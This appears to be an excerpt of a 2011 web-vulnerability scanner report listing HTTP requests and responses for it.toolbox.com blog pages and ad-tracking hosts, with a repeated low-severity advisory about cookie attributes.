GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%2fventure-and-gender-43847 HTTP/1.1 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1a96l00i0p01050410h; orblb=2lfk1rn012dh10u0100000; rdrlst=20z0s7dpletz4d0000000e0p01050410eo2ylebnns0000000i0p01050410h10flfk1rn000000030p01050310310elfk1rn000000030p010503103mmnlebnns0000000i0p01050410hxo1lebnns0000000i0p01050410hx1blebnns0000000i0p01050410heh5lf17qf0000000a0p01050410a6bylemlne0000000g0p01050410gw3clebnns0000000i0p01050410h7gmlebnns0000000i0p01050410hjv6lebnns0000000i0p01050410hj4ilew2e20000000c0p01050410cxthlebnns0000000i0p01050410hfullf8gij000000060p0105041060c9lfk1rn000000030p010503103jillebnns0000000i0p01050410hfuqlegh2b0000000h0p01050410hb6mlf17qk000000090p010504109mz1lebnns0000000i0p01050410hcajlfk1rn000000030p010503103p7vlebnns0000000i0p01050410h7vglfk1rn000000030p010503103xvslebnns0000000i0p01050410h10rlfjpei000000040p010504104xuklebnns0000000i0p01050410hx1jlebnns0000000i0p01050410hjk7lebnns0000000i0p01050410hcbnlfk1rn000000030p010503103yiplebnns0000000i0p01050410hyh0lebnns0000000i0p01050410hxwflebnns0000000i0p01050410he4vlebnns0000000i0p01050410hjwblfk1rn000000030p010503103xwblebnns0000000i0p01050410h; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000080p010504108ag2leqh190vft400f0p01050410f82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00i0p01050410h5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000040p010504104820lebnns181qq00e0l000400100b0olfjpei000000040p010504104ab4lebnns181qq00i0p01050410h9szlebnns181qq00i0p01050410h8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b15fs200h0p01050410hal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000040p010504104b08lfjpei000000040p01050410440slebnns181qq00e0l00040010045mlfdxmc000000050p010504105a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1b9mx00j0q01050510i; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: rdrlst=2100so2ylebnns0000000j0q01050510i7dpletz4d0000000f0q01050510f10flfk1rn000000040q010504104mmnlebnns0000000j0q01050510i10elfk1rn000000040q01050410410rlfmxap000000010q010501101x1blebnns0000000j0q01050510ixo1lebnns0000000j0q01050510ieh5lf17qf0000000b0q01050510b6bylemlne0000000h0q01050510hw3clebnns0000000j0q01050510i7gmlebnns0000000j0q01050510ijv6lebnns0000000j0q01050510ij4ilew2e20000000d0q01050510dxthlebnns0000000j0q01050510ifullf8gij000000070q0105051070c9lfk1rn000000040q010504104jillebnns0000000j0q01050510ifuqlegh2b0000000i0q01050510ib6mlf17qk0000000a0q01050510amz1lebnns0000000j0q01050510icajlfk1rn000000040q010504104p7vlebnns0000000j0q01050510i7vglfk1rn000000040q010504104xvslebnns0000000j0q01050510i10rlfjpei000000050q010505105xuklebnns0000000j0q01050510ijk7lebnns0000000j0q01050510ix1jlebnns0000000j0q01050510iyiplebnns0000000j0q01050510icbnlfk1rn000000040q010504104xwflebnns0000000j0q01050510iyh0lebnns0000000j0q01050510ie4vlebnns0000000j0q01050510ixwblebnns0000000j0q01050510ijwblfk1rn000000040q010504104; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000090q01050510982gletz4d0pqa500a0l000400100ag2leqh190wg9g00g0q01050510g82hlebnns181qq00j0q01050510i9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000050q010505105820lebnns181qq00e0l000400100b0olfjpei000000050q010505105ab4lebnns181qq00j0q01050510i9szlebnns181qq00j0q01050510i8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b16g8e00i0q01050510ial1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000050q0105051058bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000050q01050510540slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000060q01050510640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/ Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days Content-Length: 0 Date: Wed, 26 Jan 2011 14:52:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/it.toolbox.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847&ref=http%3A%2F%2Fburp%2Fshow%2F4&1yua7sg HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 274 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 26 Jan 2011 14:52:01 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 25 Feb 2011 14:52:01 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296053521.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 25-Jan-2013 14:47:11 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 26 Jan 2011 14:52:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 26 Jan 2011 14:52:01 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68764 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67441 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70278 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72957 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72699 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68279 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66943 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73552 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66827 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85703 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:44:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 75502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:08 GMT Connection: close
